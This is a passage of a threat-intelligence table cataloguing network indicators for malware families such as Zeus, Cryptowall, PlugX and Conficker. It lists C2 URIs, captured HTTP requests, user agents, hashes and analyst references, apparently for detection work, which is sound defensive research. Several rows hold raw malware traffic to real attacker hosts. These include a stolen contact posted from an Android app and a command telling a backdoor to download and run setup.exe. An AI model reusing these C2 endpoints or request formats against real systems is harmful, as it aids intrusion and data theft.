309 | 2015-02-01 | APT | Panda | POST | /Photos/Query.cgi?loginid= | Query.cgi?loginid= | https://github.com/kbandla/APTnotes/blob/master/2014/AdversaryIntelligenceReport_DeepPanda_0%20(1).pdf | ||||||||||
310 | 2015-02-01 | APT | Aided Frame | GET | /img/js.php | /img/js.php | https://github.com/kbandla/APTnotes/blob/master/2014/Aided_Frame_Aided_Direction.pdf | ||||||||||
311 | 2015-02-01 | APT | Scanbox Watering hole framework | POST | /i/recv.php | /i/recv.php | |||||||||||
312 | 2015-02-01 | CRIME | Blackenergy DDoS Bot | GET | /upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php | /getcfg.php | hxxps://46.165.222.28/upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php | https://github.com/kbandla/APTnotes/blob/master/2014/BlackEnergy2_Plugins_Router.pdf | |||||||||
313 | 2015-02-01 | APT | Syria Twitter.apk | POST | /contacts | /contacts | POST /contacts HTTP/1.1 Content-Length: 43 Content-Type: application/x-www-form-urlencoded Host: 80.241.223.128:4646 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) contact%26=null%26John+Rogers%26+2175566789 | apk Android | b91315805ef1df07bdbfa07d3a467424 | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-behind-the-syria-conflict.pdf | |||||||
314 | 2015-02-02 | APT | TinyBaron / Miniduke / CosmicDuke | GET | <p> /modules/db/mgr.php? <p> /modules/db/mgr.php?F=3? | /modules/db/mgr.php? | <p> 8e5106565fd96df1308d208d1e3426a3 <p> f22606385080d35551e7f8e8f49b7de9 | http://www.symantec.com/security_response/writeup.jsp?docid=2014-052717-4610-99 | |||||||||
315 | 2015-02-01 | CRIME? | Moure | GET | <p> /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM= <p> /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDgBPLBsfR0kzCxMGHG11ay5k <p> /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABRFJR4QDwM5GxUWEnRhbG9n <p> /G1clBYJoKWYuZGZkcm90aWs8C14MChZSLhodAkIyRxYQFnJvdGlr <p> /GFAmHZhsNmducy1vZXRmdWw_HB8YCh1TbwARHUsjBR4GHHBlbnMu <p> /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFPLAEGR0kzAR0XHG1vci5k | 80 | 3a8715ca4dbc233e68e8063b5c76f0f7 <p> 10002e607b1179593df21bd2825ccf17 | http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Moure-D/detailed-analysis.aspx | |||||||||
316 | 2015-02-01 | CRIME | Vundo | GET | <p> /webhp <p> /wpad.dat | <p> /webhp <p> /wpad.dat | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR | 80 | 07c0824d98d7894882171ec40b633b30 | http://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=4216306#none | |||||||
317 | 2015-02-03 | CRIME / APT | Lostdoor RAT | INFO||LostDoor-001|Remote PC|| Windows XP Professional|<time>|511.56 MB|No|C:\\\\WINDOWS\\\\system32\\\\cmd.exe|2:13:42 | |LostDoor-001 | http://bit.ly/crimesamples | |||||||||||
318 | 2015-02-03 | APT | Protux worm | POST | <p> http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3 <p> http://202.71.136.14:80/ggBwkFNqDu1869.avi <p> /newTroy.jpg <p> /http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3 | <p> .mp3 <p> .rar <p> .avi <p> .jpg | POST http://ruising.webmailerservices.com:80/ggBwkFNqDu1869.avi HTTP/1.1 User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) Host: ruising.webmailerservices.com Content-Length: 42 Proxy-Connection: keep-alive Pragma: no-cache | Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32) | 80 | POST http://%s:%d/%s | ce4733f42cb169f853abfd38b3ba2ffb 123e186577d3b7deb3f338fa675f3e8a | http://camas.comodo.com/cgi-bin/submit?file=2ed5823001b672a37cecdb01b74ebf3eedb59fb112a551efb4988998aa800ca5 | http://bit.ly/aptsamples | ||||
319 | 2015-02-03 | CRIME | Conficker D / Kido worm | GET | /search?q=0 | /search?q=0 | GET /search?q=0 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR | 80 | 00c62ecb5580ad5a8de3367b0c9cbb13 | |||||||
320 | 2015-02-03 | CRIME | Conficker / Kido worm | GET | / ip checking services | / ip checking services | GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: www.getmyip.org Cache-Control: no-cache GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: www.whatsmyipaddress.com Cache-Control: no-cache GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: checkip.dyndns.org Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | 80 | http://mtc.sri.com/Conficker/ | http://bit.ly/crimesamples | ||||||
321 | 2015-02-03 | CRIME | Dingu / Proxy | GET | <p> /1.jpg <p> http://webemail.bounceme.net:8080/directget42.gif | <p> .jpg <p> .gif | GET /1.jpg HTTP/1.1 X-HOST: Remote PC@10.0.1.15 User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) Host: 11.36.214.181 Connection: Keep-Alive Cache-Control: no-cache GET http://webemail.bounceme.net:8080/directget42.gif HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3) Host: webemail.bounceme.net X-HOST: mr-computer@192.168.5.133 Pragma: no-cach | Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0) | 80 | "CONNECT X-HOST": %s | CD19E4D5EC26C1DD72F39537750F0A60 efa1add763eef93e8d759b090bfe518e | http://safezonecast.lgcns.com/Common/MenaceInfo/pop.MenaceInfo.jsp?code=SZ1301-0001NS <p> http://telussecuritylabs.com/threats/show/TSL20130115-05 | http://bit.ly/crimesamples | ||||
322 | 2015-02-03 | CRIME | Dyre | GET | /1/manualec.pdf | GET /1/manualec.pdf HTTP/1.1::~~Accept: text/*, application/*::~~User-Agent: Mazilla/5.0::~~Host: marodz.republika.pl::~~Cache-Control: no-cache: | Mazilla/5.0 | 80 | c97e6f2ad67b2cabc48025ffd5a463f3 | ||||||||
323 | 2015-02-03 | CRIME | Zeus | GET | /ycJ2Jj7r4t3wc6y4/ali.jpg | .jpg | GET /ycJ2Jj7r4t3wc6y4/ali.jpg HTTP/1.1::~~Accept: */*::~~Connection: Close::~~User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)::~~Host: domefocrisis.ru::~~Cache-Control: no-cache::~~::~~ | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) | 80 | ||||||||
324 | 2015-02-03 | CRIME | Cryptowall | POST | /tpnofu223t8h8dl | /tpnofu223t8h8dl | POST /tpnofu223t8h8dl HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Connection: Close Content-Length: 102 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: macrobiotics-japan.com:65535 Cache-Control: no-cache Parameters: u=0d13e860dc0c8c3fb00b0adb948eefeceedfc07ed3961c5ee80d68db76fee9c76b394d5ecd0065a1f1e1b0fad330eb385553 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | 65535 | 7329ed264ceb1a5fe0044844c82d6446 | |||||||
325 | 2015-02-03 | CRIME | Cryptowall | POST | <p> /4175iq691v3l <p> GET /raw <ip-addr.es> <p> /img.php <p> /img5.php <p> /img2.php | /4175iq691v3l <p> /img2.php | GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: ip-addr.es Cache-Control: no-cache GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: curlmyip.com Cache-Control: no-cache GET /raw HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: myexternalip.com Cache-Control: no-cache POST /4175iq691v3l HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Connection: Close Content-Length: 102 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 94.247.28.29:8080 Cache-Control: no-cache v=7d3b1f369de53be6ead161705e3ed6a7cfaa0d5067b89224f9d74f0e43ee4e018afbf7b63956479ea46fdc19b807c1d3787e | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) | 81, 8080 | ad9df601fbcc60413af1c0637717add4 | |||||||
326 | 2015-02-03 | CRIME | Galapoper / Tibs Downloader | GET | <p> /pic/tool.jpg <p> /pic/search.jpg <p> /pic/tibs.jpg <p> /pic/proxy.jpg <p> /pic/winlogon.jpg | <p> /pic/tool.jpg <p> /pic/search.jpg <p> /pic/tibs.jpg <p> /pic/proxy.jpg <p> /pic/winlogon.jpg | GET /pic/tibs.jpg HTTP/1.1 Host: uniqcount.net | 80 | 1f866d0d6588c925fcaa8dd664762dee | http://about-threats.trendmicro.com/us/archive/malware/TROJ_GALAPOPE.BB | |||||||
327 | 2015-02-03 | APT | Wykcores | GET | <p> /279843 <p> /279859 <p> /280015 <p> /287171 <p> /315171 <p> /110937 <p> /111968 <p> /113000 <p> /114031 <p> /115062 | GET /279859 HTTP/1.0 Connection: Keep-Alive Accept: */* Host: BufFet.SerVeHttp.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Extra-Data-Bind: 88F4324FC88F5340 Extra-Data-Space: 65536 Extra-Data: 4ZFNSAAEAAh0AINAAAAAAgRCHAiCAAwFKAAAXQi/HAA/IAAAgMAAAglAAAQCEAAAjUEBAUAAAAQAAAAAooAAAIAAAAATAAAAOCAAAwKAAAgrAAAA8CAAAANAAAQQAYEAxAQMAQEAEBANAgDA2AQNAMDAwAAOAIEAEBAMAUDA3AQNAADA1AAOAUDAwAwNAQDA1AAMAUDAEBQNAMDAAAwUAUGAyBgdAkGAjBQZAACAQBQYAMGArBAIAIDAAAAAAMFAZBwUAQFAFBQTAAAASBQZA0GAvBAdAUGAgAAUAMEAAAAAAA== Cache-Control: no-cache Pragma: no-cache Content-Length: 0 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | 80 | 085C3C226AB38E79B79055BB0B164E39 | http://www.threatexpert.com/report.aspx?md5=085c3c226ab38e79b79055bb0b164e39 | http://bit.ly/aptsamples | ||||||
328 | 2015-02-04 | ADV | Ads - Zenovia Digital Exchange (not necessarily malicious) | GET | /?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ=&url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2Fpubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic%2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs | /?wc= | 80 | http://www.adnetworkdirectory.com/ad_networks/?id=473&n=Zenovia+Digital+Exchange | |||||||||
329 | 2015-02-04 | CRIME | EsFury worm | GET | http://0-1-0-0-0-0-0-1-1-0-0-1-0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0-0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/DATA http://0-1-0-0-0-0-0-1-1-0-0-1-0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0-0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/VERSION.TXT | /DATA <p> /VERSION.TXT | 80 | 9E684440F4D5F3AFF05FF74497BF865AA676DC4C | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm:Win32/Esfury.A#tab=2 <p> http://www.threatexpert.com/report.aspx?md5=2908b7e5c9802f554c18a8732e23ee7b | ||||||||
330 | 2015-02-04 | CRIME | PornoAsset / LockEmAll Ransomware | GET | /a.php?f=647&e=2 | <p> /c.php?f=635&e=2 <p> /a.php?f=647&e=2 <p> /q.php?f=668&e=2 | hxxp://1.nwnudbg.ru/a.php?f=647&e=2 | 80 | http://www.malwaredomainlist.com/forums/index.php?topic=4625.200;wap2 <p> http://www.malwaredomainlist.com/mdl.php?inactive=on&sort=Reverse&search=&colsearch=All&ascordesc=DESC&quantity=50&page=1673 | ||||||||
331 | 2015-02-04 | CRIME | FakeAV Privacy Center | GET | <p> /dfgsdfsdf.php <p> /mf.php <p> /css/new-mobile.css <p> /js/wsjs.js <p> /js/caf.js | <p> /dfgsdfsdf.php <p> /mf.php <p> /css/new-mobile.css <p> /js/wsjs.js <p> /js/caf.js | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | 80 | 1fb198e24fc7553ce12cedfecf20258b | https://www.virustotal.com/en/file/3d493a1d49453ace34ee815c7f8687f08e622ee85833e3f6f9d333e758aef89d/analysis/ | |||||||
332 | 2015-02-04 | CRIME | Zeus V2 (drop zone, config) | GET / POST | <p> /panel3/gotobank.php <p> /panel3/ppnl3.exe <p> /panel3/ppnl3.bin <p> /ppnl3.bin | <p> /panel3/gotobank.php <p> /panel3/ppnl3.exe <p> /panel3/ppnl3.bin <p> /ppnl3.bin | http://www.malwaredomainlist.com/mdl.php?search=1lqqcprexq4f4gg84aiisomxt.net&inactive=on | ||||||||||
333 | 2015-02-04 | CRIME | Blathla / Cadro adware | GET | /1.gif | /1.gif | GET /1.gif HTTP/1.1 Accept: */* Host: 122.zzso.cn Connection: Keep-Alive Cache-Control: no-cache | d7c59e5628352169a44d0bf53d7c1b92 | http://www.threatexpert.com/report.aspx?md5=fc320df83492e0795cd4f4ab3a4b8768 | http://bit.ly/crimesamples | |||||||
334 | 2015-02-04 | CRIME | Vundo / Krap | POST | / | / | POST / HTTP/1.1 GZIP: true User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) WinNT 5.1 Host: 85.12.43.104 Content-Length: 112 Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0) WinNT 5.1 | 2b1a9fa09ed6756010579143d53f418e | https://www.virustotal.com/en/file/1b9d5cd1a4da9348d8bf7e77d02f0f975f3346b6ce64337a28e1cc66353ea984/analysis/ | http://bit.ly/crimesamples | ||||||
335 | 2015-02-04 | CRIME | Vundo / Krap | POST | /frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA | /frame.html? | POST /frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowMi8xBARyMj0wLmQGBEcHPzRCAz4wRwI0NEMHyI1AAyQw6So0NA HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) WinNT 5.1 Host: pancolp.com Content-Length: 182 Cache-Control: no-cache NzRAEyKqWxUtKS1LnKdgRjRlxFowMi8xBARyMj0wLmQGBEcHPzRCAz4wRwI0NEMHyI1AAyQw6So0NEkDOBxCAzRxOnNYWzBmRjRCAzQ0QgM0NEIDNDRCAzQ1QgM0NEIDNDRCAzQ0TyM0NEIDNDRCAzQ0QgM0NEIDNDRCAzQ0QgM0NEIDNDRCAw | Mozilla/4.0 (compatible; MSIE 6.0) WinNT 5.1 | 5e10bbe5e48db06528eb492c1b9d887a | http://bit.ly/crimesamples | |||||||
336 | 2015-02-04 | CRIME | VOlk bot | GET | /WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1 User-Agent: vb wininet Host: portalcinemark.us | /priv8/bots.php?name=j | GET /WebPanel/priv8/bots.php?name=user&so=5.01&zila=&mail= HTTP/1.1 User-Agent: vb wininet Host: portalcinemark.us | vb wininet | 80 | d49baf1d7a5721c6356f337d392b6fc2 | http://cybercrime-tracker.net/index.php?s=0&m=40&search=vOlk%20Botnet | ||||||
337 | 2015-02-04 | CRIME | Oficla / Sasfis | GET | <p> /21/download.php?expid=0&fid=1 <p> /s/download.php?expid=4&fid=1 <p> /l1/bb.php?v=200&id=554905388&b=9468674099&tm=3 <p> /dmr/bb.php?v=200&id=554905388&b=OLD&tm=3 <p> /np/load.php?spl=hcp&b=ff&o=xp&i=hcp <p> /phpbb/image2/cp.php?i=15 | <p> ?expid= <p> /bb.php?v= <p> /load.php?spl= <p> /cp.php?i= | GET /21/download.php?expid=0&fid=1 HTTP/1.1 Accept: */* UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: avalaz.info Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | 80 | 2bb16459d424cfa02df19bb47acf57ec | http://www.malwaredomainlist.com/mdl.php?inactive=on&sort=Reverse&search=oficla&colsearch=All&ascordesc=DESC&quantity=50&page=8 | ||||||
338 | 2015-02-04 | APT | Pingbed | GET | /default.htm /default1.htm /default2.htm | /default.htm | GET /default.htm HTTP/1.1 User-Agent: Windows+NT+5.1 Host: <host> Cache-Control: no-cache | Windows+NT+5.1 | 80 | fc8bb55a02854c50cff4afbe141592e1 | https://www.virustotal.com/en/file/587581ec00c1f3f9403a8dca514e82992c84763204c5dd50d7e593042fe83cbf/analysis/ | ||||||
339 | 2015-02-04 | APT | Minaps backdoor | GET / POST | <p> /download/device_ad.asp?device_ t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko <p> /download/logo.png <p> /download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A <p> POST /download/device_input.asp?device_t =2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi | /download/l | GET /download/device_ad.asp?device_t=8054693706&key=ptvcrcqz&device_id=ad&cv=ptvcrcqzlyepaudko HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-gb User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0 ) Host: AdobeFlash.info.tm | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0 ) | 80 | c99fa835350aa9e2427ce69323b061a9 | https://malwr.com/analysis/ZDNlOTExZGRlNTZjNGEyMzkzMmQwOGMxMjI1MTE4NjE/ | ||||||
340 | 2015-02-04 | CRIME | QHost / Orsam / Bicololo | GET | /stat/tuk/183 | /stat/tuk/183 | GET /stat/tuk/183 HTTP/1.1 Accept: */* UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 46.166.165.108:12121 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | 1999, 12121. various | af4932b4b2fe4afb4fe981feec61bf3b | http://home.mcafee.com/virusinfo/virusprofile.aspx?key=1735438#none | http://bit.ly/crimesamples | |||||
341 | 2015-02-05 | CRIME | Cryptolocker / DirtyDecrypt | POST | / | cmd in POST | POST / HTTP/1.1 Host: ktbqomgixqhtsxevonpw.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE) Content-Type: multipart/form-data; boundary=EzEtSsOYGuRnWmacZefh Content-Length: 100 Accept-Language: en-us Accept: text/html, application/xml;q=0.9, application/xhtml+xml;q=0.9, image/png, image/jpeg, image/gif, image/x-xbitmap, *\*;q=0.1 Accept-Charset: utf-8, utf-16;q=0.6, *;q=0.1 Pragma: no-cache Connection: close --EzEtSsOYGuRnWmacZefh Content-Disposition: form-data; name="cmd" cr --EzEtSsOYGuRnWmacZefh-- | Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE) | 80 | 01590ef339e8b7301638b0e4e4972fe7 | www.virustotal.com/en/file/9df6a1f3eef45d15f9a3c587b3fa0ef02c25b40da8c8c87293e5c442c991fd6c/analysis/ <p> http://www.bleepingcomputer.com/forums/t/501540/ransomcrypt-dirtydecryptexe-uses-efs/ | http://bit.ly/crimesamples | |||||
342 | 2015-02-05 | ADV | MarketScore Proxy | POST | /cidpost | http://netmon.net. properties/net.info?adapter= | POST /cidpost HTTP/1.1 Accept: text/html, */* Accept-Language: x-ns1PWzDslUqNxQ,x-ns2Ge2M1OjPOPN X-CSOR-Versions: (0.0.0.0,0.0.0.0) X-M: 168703955 X-H: 62117348 X-OSSProxy: OSSProxy 1.3.337.344 (Build 337.344 Win32 en-us)(Oct 31 2014 12:56:00) Content-Type: text/xml Content-Length: 407 Content-Encoding: deflate X-Uncompressed-Length: 606 User-Agent: OSSProxy 1.3.337.344 (Build 337.344 Win32 en-us)(Oct 31 2014 12:56:00) Host: oss-content.securestudies.com Cache-Control: no-cache | OSSProxy 1.3.337.344 (Build 337.344 Win32 en-us)(Oct 31 2014 12:56:00) | 80 | www.spysweeper.com/remove-marketscore.htm | |||||||
343 | 2015-02-07 | APT | Windata | <p> XYZ /WinData.DLL?HELO-STX-1*10.0.0.15* Remote PC*[MAC:00-55-28-11-21-23 <p> XYZ /WinData.DLL?HELO-STX-1*1[IP Address]* [Computer Name]*0605[MAC:[Mac Address]]$ | WinData.DLL?HELO-STX- | 80 | <p> 5f1225ff619c8ac13e7bf2bf2fe843b7 <p> 5a3ea9e1007e9b6a5bb94d5999d6e022 <p> 7acac1bac83b8c44a2d2f1571e795051 | https://0xicf.wordpress.com/category/courses/ | http://bit.ly/aptsamples | ||||||||
344 | 2015-02-08 | CRIME | Screenblaze / Prosti Adware | GET | <p> /curver.php <p> /scr2.php?id=3&serial=0&ver=2.1.20 | <p> /curver.php <p> /scr2.php?id= | GET /curver.php HTTP/1.1 User-Agent: WinInetHTTP Host: www.screenblaze.com Cache-Control: no-cache GET /scr2.php?id=3&serial=0&ver=2.1.20 HTTP/1.1 User-Agent: WinInetHTTP Host: www.screenblaze.com Cache-Control: no-cache | WinInetHTTP | 80 | 00001ffe4e2c3218db5eecfd16b97a9f | http://totalhash.com/analysis/ae44154b2d9f09e5c0cdbce760f374398784b2e8 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | ||||
345 | 2015-02-08 | CRIME | Winwebsec / FakeAV Security Shield | GET | /clbk.php?q=OVNaTVhDHkUERx1Y ClgNUghKSFMQRVVDHEdFRR1cFQxjbn Roc2J2eHVDB0JPFwFWEFERAEQe TFBYRgpHWkRNTQAPRw4WUQhI | /clbk.php?q= | GET /clbk.php?q=OVNaTVhDHkUERx1YClgNUghKSFMQRVVDHEdFRR1cFQxjbnRoc2J2eHVDB0JPFwFWEFERAEQeTFBYRgpHWkRNTQAPRw4WUQhI HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Host: 31.184.232.58 Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) | 80 | http://labs.vericon.li/2012/05/security-shield-2012-schadsoftware-erkennen/ | http://bit.ly/crimesamples | ||||||
346 | 2015-02-08 | CRIME | Virtumonde (old) | POST | <p> g_Version: 25. <p> g_SetID: J`y. <p> g_AffiliateID: y. <p> g_URL: 8. <p> g_Client: <p> g_ClientGUID: <p> g_GZipSupported: <p> g_UID: | POST / HTTP/1.1. g_Version: 25. g_SetID: J`y. g_AffiliateID: y. g_URL: 8. g_Client: .Sf"yG:yGG:JGJ:Nk %uK.q+,y^ZcSy:n}Iy:P'][HA:On] <at> 8/FQ"`:y:J9GGg)O?BFVO S[VE yi8.K"9:G:JNGG:yyG98vR"!GG8Z}V"KQxAFf'86Wn"GGGGGkGh#o)]VV=}QQ"/On +]Q GJ Jy"yh"Gy JGGko=}QQ"/On +]Q GJ Jy"yh"Gy JGGko=}QQp]I"!NofU=}QQOVUv})O?BO?\v'] +]Q G! Gh"yh"Gy JGGkoe;9GGGG>1;!9GGGGG>R;k!JGGGGGo. g_ClientGUID: 0`-N=cc-G^-9XK^k`k,^chcG^c-!!,X-y=h,cb. g_GZipSupported: U?]O. g_UID: jyjjJm[JY|!!cI1Xn[J[INx`w:. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1). Host: virtumonde.com. | 80 | http://blog.gmane.org/gmane.comp.security.ids.snort.sigs/month=20040601/page=3 | http://bit.ly/crimesamples | ||||||||
347 | 2015-02-08 | APT | DarkKomet | <p>8EA4AB05FA7E <p>D573BA5A4EFFC3FB629308 will vary - encrypted keep alive or other data | <p>8EA4AB05FA7E <p>D573BA5A4EFFC3FB629308 | 1604 | 81f12e17ffc59bf0be7ec736f37b2db0 0025cb6f62775a118b94ef22ecc1c05c | http://resources.infosecinstitute.com/darkcomet-analysis-syria/ | http://bit.ly/aptsamples | ||||||||
348 | 2015-02-08 | APT | PlugX / Korplug / Gulpix | POST | /update?id= | /update?id= | POST /update?id=000f6b50 HTTP/1.1 Accept: */ X-Session: X-Status: X-Size: 61456 X-Sn: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705) Host: exchange.likescandy.com Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache - | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705) | 80 | 00fdb6ad7345c0912ea9d2fa4c49950e | http://blog.cassidiancybersecurity.com/post/2014/01/plugx-some-uncovered-points.html | http://bit.ly/aptsamples | |||||
349 | 2015-02-09 | ADV | PUP SelfInstall | POST | /off/mundo /tid/mundo http://interact.appclick.co/api/values/count | /mundo | POST /off/mundo HTTP/1.1 Content-Type: application/json; charset=utf-8 Accept: application/json; installerversion: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: 2-vinstaller.com Content-Length: 606 Cache-Control: no-cache {"Content":"Frs.<long string> / HTTP/1.1 Content-Type: application/json; charset=utf-8 Accept: application/json; installerversion: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: 2-vinstaller.com Content-Length: 2930 Cache-Control: no-cache {"Content":"Frsjo<long string> | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) | 9f26de41c7520929ea4f4f7e61abe1a6 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | ||||||
